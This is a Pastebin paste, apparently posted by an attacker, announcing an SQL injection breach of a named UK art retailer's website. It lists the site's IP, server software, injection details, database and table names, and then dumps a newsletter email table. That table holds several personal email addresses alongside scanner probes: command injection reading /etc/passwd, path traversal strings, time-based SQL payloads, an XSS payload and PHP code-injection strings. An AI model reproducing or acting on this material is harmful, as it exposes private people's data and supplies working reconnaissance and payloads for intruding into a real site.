Advertisement
AnonymousKH

#SQL | www.affordablebritishart.co.uk Leak by Attacker-Fiber

May 8th, 2014
515
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.23 KB | None | 0 0
  1. Target : www.affordablebritishart.co.uk
  2.  
  3. Host IP: 217.160.116.42
  4. Web Server: Apache
  5. Powered-by: PHP/5.2.17
  6. Keyword Found: Page
  7. Injection type is Integer
  8. DB Server: MySQL >=5
  9. Selected Column Count is 25
  10. Valid String Column is 1
  11. Current DB: db195043906
  12.  
  13. alerts
  14. artists
  15. discounts
  16. news_emails
  17. opportunity
  18. pics
  19.  
  20. Email Leak by Attacker Fiber
  21.  
  22. 41
  23. 61 Angus.Ballantine@Live .co.uk
  24. 144 patinspire.co.uk
  25. 155 dianne_elsworth@yahoo,co.uk
  26. 160 [email protected] www.arizi info
  27. 189 desmondackers@virginmedia .com
  28. 236 -1'
  29. 233 1
  30. 234 1
  31. 235 1
  32. 237 1
  33. 242 1
  34. 241 1
  35. 245 1
  36. 243 1
  37. 244 -1'
  38. 246 1
  39. 247 1
  40. 250 1
  41. 248 1
  42. 249 -1'
  43. 256 1
  44. 257 1
  45. 253 1
  46. 254 1
  47. 255 1
  48. 258 -1'
  49. 259 1
  50. 267 1
  51. 266 1
  52. 265 1
  53. 271 1
  54. 268 1
  55. 269 1
  56. 270 -1'
  57. 276 response.write(9570025*9020598)
  58. 277 '+response.write(9570025*9020598)+'
  59. 278 "+response.write(9570025*9020598)+"
  60. 284 sample%40email.tst
  61. 282 sample%40email.tst
  62. 285 -1 or 97=97
  63. 283 &cat /etc/passwd&
  64. 286 -1 or 97=0
  65. 287 '&cat /etc/passwd&'
  66. 289 "&cat /etc/passwd&"
  67. 288 -1' or '97'='97
  68. 290 -1' or '97'='0
  69. 294 -1" or "34"="0
  70. 292 -1" or "34"="34
  71. 293 `cat /etc/passwd`
  72. 296 '|'ld
  73. 295 |cat /etc/passwd#
  74. 297 sample%40email.tst' and sleep(4)='
  75. 298 "|"ld
  76. 301 sample%40email.tst' and (sleep(4)+1) limit 1 --
  77. 299 ;cat /etc/passwd;
  78. 300 ';cat /etc/passwd;'
  79. 304 sample%40email.tst" and sleep(4)="
  80. 302 ";cat /etc/passwd;"
  81. 303 ||cat /etc/passwd
  82. 305 &dir
  83. 306 '&dir&'
  84. 308 sample%40email.tst" or (sleep(4)+1) limit 1 --
  85. 313 '|dir
  86. 309 "&dir&"
  87. 307 sample%40email.tst' or (sleep(4)+1) limit 1 --
  88. 310 sample%40email.tst'=sleep(4)='
  89. 311 |dir
  90. 312 sample%40email.tst"=sleep(4)="
  91. 315 "|dir
  92. 319 sample%40email.tst';select pg_sleep(4); --
  93. 316 sample%40email.tst or (sleep(4)+1) limit 1 --
  94. 323 sample%40email.tst'; waitfor delay '0:0:4' --
  95. 324 SomeCustomInjectedHeader:injected_by_wvs
  96. 326 sample%40email.tst"; waitfor delay '0:0:4' --
  97. 336 ../../../../../../../../../../etc/passwd
  98. 340 ../../../../../../../../../../etc/passwd.tst
  99. 339 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.tst
  100. 345 ..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.tst
  101. 343 Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
  102. 351 .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
  103. 348 /../..//../..//../..//../..//../..//etc/passwd.tst
  104. 354 /etc/passwd
  105. 360 ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
  106. 357 ../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
  107. 366 invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
  108. 363
  109. 369 file:///etc/passwd
  110. 373 /\../\../\../\../\../\../\../etc/passwd
  111. 375 ../../../../../../../../../../windows/win.ini
  112. 377 268435455
  113. 378 ../../../../../../../../../../boot.ini
  114. 380
  115. 381 ../../../../../../../../../../windows/win.ini.tst
  116. 383 ..
  117. 384
  118. 388 ................windowswin.ini
  119. 386 1e309
  120. 389 Array
  121. 390 ${99408+99881}
  122. 392 ..\..\..\..\..\..\..\..\windows\win.ini
  123. 394 /.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
  124. 395 http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.tst
  125. 397 ../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
  126. 398 1some_inexistent_file_with_long_name%00.tst
  127. 401 ../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
  128. 399 http://testasp.vulnweb.com/t/fit.txt?%00.tst
  129. 406 [email protected]&n908774=v918572
  130. 408 unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.
  131. 409 )
  132. 413 !(()&&!|*|*|
  133. 415 Array
  134. 419 '"()
  135. 417
  136. 422 ;print(md5(acunetix_wvs_security_test));
  137. 426 ';print(md5(acunetix_wvs_security_test));$a='
  138. 431 http://testasp.vulnweb.com/t/xss.html?%00.tst
  139. 430 ";print(md5(acunetix_wvs_security_test));$a="
  140. 434 ${@print(md5(acunetix_wvs_security_test))}
  141. 436 sample%40email.tst
  142. 438 acunetix_wvs_invalid_filename
  143. 437 1'"
  144. 435 sample%40email.tst
  145. 442
  146. 440 ${@print(md5(acunetix_wvs_security_test))}
  147. 441 newsletter.php
  148. 446
  149. 445 newsletter.php
  150. 449 newsletter.php/.
  151. 452 @@a41Ur
  152. 456 JyI=
  153. 460
  154. 463
  155. 465 )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
  156. 472 //www.acunetix.tst
  157. 481 '"()&%1<ScRiPt >prompt(948910)</ScRiPt>
  158. 479 '"
  159. 482 <!--
  160. 485 OTgxMzY2
  161. 501 !S!WCRTESTINPUT000000!E!
  162. 502 !S!WCRTESTINPUT000000!E!
  163. 505 99999999 oR 7=7
  164. 506 99999999 oR 7=2
  165. 503 !S!WCRTESTINPUT000000!E!
  166. 504 !S!WCRTESTINPUT000000!E!
  167. 508 !S!WCRTESTINPUT000000!E!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement